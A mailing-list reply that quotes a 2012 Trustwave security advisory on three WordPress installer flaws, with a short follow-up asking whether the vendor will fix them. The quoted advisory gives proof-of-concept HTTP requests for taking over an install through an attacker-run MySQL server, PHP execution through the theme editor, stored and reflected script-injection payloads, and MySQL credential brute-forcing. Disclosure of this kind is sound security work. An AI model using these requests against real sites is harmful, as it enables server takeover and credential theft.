[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-disclosure] TWSL2012-002: Multiple Vulnerabilities in WordPress



On Tue, Jan 24, 2012 at 04:09:16PM -0600, Trustwave Advisories wrote:
> Trustwave's SpiderLabs Security Advisory TWSL2012-002:
> Multiple Vulnerabilities in WordPress
> 
> https://www.trustwave.com/spiderlabs/advisories/TWSL2012-002.txt
> 
> Published: 1/24/12
> Version: 1.0
> 
> Vendor: WordPress (http://wordpress.org/)
> Product: WordPress
> Version affected: 3.3.1 and prior
> 
> Product description:
> WordPress is a free and open source blogging tool and publishing platform
> powered by PHP and MySQL.
> 
> Credit: Jonathan Claudius of Trustwave SpiderLabs
> 
> Finding 1: PHP Code Execution and Persistent Cross Site Scripting
> Vulnerabilities via 'setup-config.php' page.
> CVE: CVE-2011-4899
> 
> The WordPress 'setup-config.php' installation page allows users to install
> WordPress in local or remote MySQL databases. This typically requires a user
> to have valid MySQL credentials to complete.  However, a malicious user can
> host their own MySQL database server and can successfully complete the
> WordPress installation without having valid credentials on the target system.
> 
> After the successful installation of WordPress, a malicious user can inject
> malicious PHP code via the WordPress Themes editor.  In addition, with control
> of the database store, malicious Javascript can be injected into the content
> of WordPress yielding persistent Cross Site Scripting.
> 
> Proof of Concept:
> 
> Servers Involved
> 
> A.B.C.D = Target WordPress Web Server
> W.X.Y.Z = Malicious User's MySQL Instance
> 
> 1.) Malicious User hosts their own MySQL instance at W.X.Y.Z on port 3306
> 
> 2.) Performs POST/GET Requests to Install WordPress into MySQL Instance
> 
> Request #1
> ----------
> POST /wp-admin/setup-config.php?step=2 HTTP/1.1
> Host: A.B.C.D
> User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) 
> Gecko/20100101 Firefox/8.0.1
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> Accept-Language: en-us,en;q=0.5
> Accept-Encoding: gzip, deflate
> Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
> Proxy-Connection: keep-alive
> Referer: http://A.B.C.D/wp-admin/setup-config.php?step=1
> Cookie: wp-settings-time-1=1322687480; wp-settings-1=m9%3Do
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 81
> 
> dbname=wordpress&uname=jsmith&pwd=jsmith&dbhost=W.X.Y.Z&prefix=wp_&submit=Submit
> 
> Request #2
> ----------
> GET /wp-admin/install.php HTTP/1.1
> Host: A.B.C.D
> User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) 
> Gecko/20100101 Firefox/8.0.1
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> Accept-Language: en-us,en;q=0.5
> Accept-Encoding: gzip, deflate
> Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
> Proxy-Connection: keep-alive
> Referer: http://A.B.C.D/wp-admin/setup-config.php?step=2
> Cookie: wp-settings-time-1=1322687480; wp-settings-1=m9%3Do
> If-Modified-Since: Wed, 07 Dec 2011 16:03:33 GMT
> 
> 3.) Get PHP Code Execution
> 
> Malicious user edits 404.php via Themes Editor as follows:
> 
> <?php
> phpinfo();
> ?>
> 
> Note #1: Any php file in the theme could be used.
> Note #2: Depending settings, PHP may be used to execute system commands
>          on webserver.
> 
> Malicious user performs get request of modified page to execute code.
> 
> Request
> -------
> GET /wp-content/themes/default/404.php HTTP/1.1
> Host: A.B.C.D
> User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) 
> Gecko/20100101 Firefox/8.0.1
> 
> 4.) Get Persistent Cross Site Scripting
> 
> Malicious User Injects Malicious Javascript into their own MySQL database 
> instance
> 
> MySQL Query
> -----------
> update wp_comments SET
> comment_content='<script>alert('123')</script>' where comment_content='Hi,
> this is a comment.<br />To delete \ a comment, just log in and view the
> post&#039;s comments. There you will have the option to edit or delete
> them.';
> 
> Non-malicious User Visits Wordpress installation and has Javascript executed 
> on their browser
> 
> Request
> -------
> GET /?p=1 HTTP/1.1
> Host: A.B.C.D
> User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) 
> Gecko/20100101 Firefox/8.0.1
> 
> 
> 
> Finding 2: Multiple Cross Site Scripting Vulnerabilities in
> 'setup-config.php' page
> CVE: CVE-2012-0782
> 
> The WordPress 'setup-config.php' installation page allows users to install
> WordPress in local or remote MySQL databases. When using this installation 
> page
> the user is asked to supply the database name, the server that the database
> resides on, and a valid MySQL username and password.
> 
> During this process, malicious users can supply javascript within
> the "dbname", "dbhost" or "uname" parameters. Upon clicking the submission
> button, the javascript is rendered in the client's browser.
> 
> Proof of Concept:
> 
> Servers Involved
> 
> A.B.C.D = Target WordPress Web Server
> 
> Request
> -------
> POST /wp-admin/setup-config.php?step=2 HTTP/1.1
> Host: A.B.C.D
> User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) 
> Gecko/20100101 Firefox/8.0.1
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> Accept-Language: en-us,en;q=0.5
> Accept-Encoding: gzip, deflate
> Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
> Proxy-Connection: keep-alive
> Referer: http://A.B.C.D/wp-admin/setup-config.php?step=1
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 112
> 
> dbname=%3Cscript%3Ealert%28%27123%27%29%3C%2Fscript%3E&uname=root&pwd=&dbhost=localhost&prefix=wp_&submit=Submit
> 
> 
> 
> Finding 3: MySQL Server Username/Password Disclosure Vulnerability via
> 'setup-config.php' page
> CVE: CVE-2011-4898
> 
> The WordPress 'setup-config.php' installation page allows users to install
> WordPress in local or remote MySQL databases. When using this installation 
> page
> the user is asked to supply the database name, the server the database resides
> on, and a valid MySQL username and password.
> 
> Malicious users can omit the "dbname" parameter during this process, allowing
> them to continually bruteforce MySQL instance usernames and passwords. This
> includes any local or remote MySQL instances which are accessible to the
> target web server. This can also be used as a method to proxy MySQL bruteforce
> attacks against other MySQL instances outside of the target organization.
> 
> Proof of Concept:
> 
> Servers Involved
> 
> A.B.C.D = Target WordPress Web Server
> L.M.N.O = Any MySQL Server for which the Web Server has network access
> 
> Request
> -------
> POST /wp-admin/setup-config.php?step=2 HTTP/1.1
> Host: A.B.C.D
> User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) 
> Gecko/20100101 Firefox/8.0.1
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> Accept-Language: en-us,en;q=0.5
> Accept-Encoding: gzip, deflate
> Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
> Proxy-Connection: keep-alive
> Referer: http://A.B.C.D/wp-admin/setup-config.php?step=1
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 32
> 
> uname=mysql&pwd=mysql&dbhost=L.M.N.O
> 
> Response (If Password is Valid)
> -------------------------------
> <---snip-->
> We were able to connect to the database server (which means your username
> and password is okay) but not able to select the database.
> <---snip-->
> 
> Response (If Password is Invalid)
> ---------------------------------
> <---snip-->
> This either means that the username and password information in your
> wp-config.php file is incorrect or we can't contact the database server at
> localhost. This could mean your host's database server is down.
> <---snip-->
> 
> 
> Vendor Response:
> Due to the fact that the component in question is an installation script,
> the vendor has stated that the attack surface is too small to warrant
> a fix:
> 
> "We give priority to a better user experience at the install process. It is
> unlikely a user would go to the trouble of installing a copy of WordPress
> and then not finishing the setup process more-or-less immediately. The
> window of opportunity for exploiting such a vulnerability is very small."
> 
> However, Trustwave SpiderLabs urges caution in situations where the
> WordPress installation script is provided as part of a default image.
> This is  often done as a convenience on hosting providers, even in
> cases where the client does not use the software. It is a best practice
> to ensure  that no installation scripts are exposed to outsiders, and
> these vulnerabilities reinforce the importance of this step.
> 
> 
> Remediation Steps:
> No official fix for these issues will be released for the WordPress
> publishing platform. However, administrators can mitigate these issues by
> creating strong MySQL passwords and defining rules within a web application
> firewall (WAF) solution. ModSecurity (http://www.modsecurity.org/) has
> added rules to the commercial rules feed for these issues, and Trustwave's
> vulnerability scanning solution, TrustKeeper, has been updated to detect
> exposed installation scripts.
> 
> 
> Vendor Communication Timeline:
> 12/22/11 - Vulnerability disclosed
> 01/16/12 - Confirmation to release vulnerabilities
> 01/24/12 - Advisory published
> 
> 
> References
> 1. http://www.wordpress.org
> 
> 
> About Trustwave:
> Trustwave is the leading provider of on-demand and subscription-based
> information security and payment card industry compliance management
> solutions to businesses and government entities throughout the world. For
> organizations faced with today's challenging data security and compliance
> environment, Trustwave provides a unique approach with comprehensive
> solutions that include its flagship TrustKeeper compliance management
> software and other proprietary security solutions. Trustwave has helped
> thousands of organizations--ranging from Fortune 500 businesses and large
> financial institutions to small and medium-sized retailers--manage
> compliance and secure their network infrastructure, data communications and
> critical information assets. Trustwave is headquartered in Chicago with
> offices throughout North America, South America, Europe, Africa, China and
> Australia. For more information, visit https://www.trustwave.com
> 
> About Trustwave's SpiderLabs:
> SpiderLabs(R) is the advanced security team at Trustwave focused on
> application security, incident response, penetration testing, physical
> security and security research. The team has performed over a thousand
> incident investigations, thousands of penetration tests and hundreds of
> application security tests globally. In addition, the SpiderLabs Research
> team provides intelligence through bleeding-edge research and proof of
> concept tool development to enhance Trustwave's products and services.
> https://www.trustwave.com/spiderlabs
> 
> Disclaimer:
> The information provided in this advisory is provided "as is" without
> warranty of any kind. Trustwave disclaims all warranties, either express or
> implied, including the warranties of merchantability and fitness for a
> particular purpose. In no event shall Trustwave or its suppliers be liable
> for any damages whatsoever including direct, indirect, incidental,
> consequential, loss of business profits or special damages, even if
> Trustwave or its suppliers have been advised of the possibility of such
> damages. Some states do not allow the exclusion or limitation of liability
> for consequential or incidental damages so the foregoing limitation may not
> apply.
> 
> This transmission may contain information that is privileged, confidential, 
> and/or exempt from disclosure under applicable law. If you are not the 
> intended recipient, you are hereby notified that any disclosure, copying, 
> distribution, or use of the information contained herein (including any 
> reliance thereon) is STRICTLY PROHIBITED. If you received this transmission 
> in error, please immediately contact the sender and destroy the material in 
> its entirety, whether in electronic or hard copy format.

These hasn't been fixed and some of these issues have been known for a while if 
you talk to users of WordPress or administrators of servers using the software. 
I am not saying that these are not real issues or anything like that. Have you 
contacted WordPress? Did they reply that they will fix these issues?

- Henri Salo

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/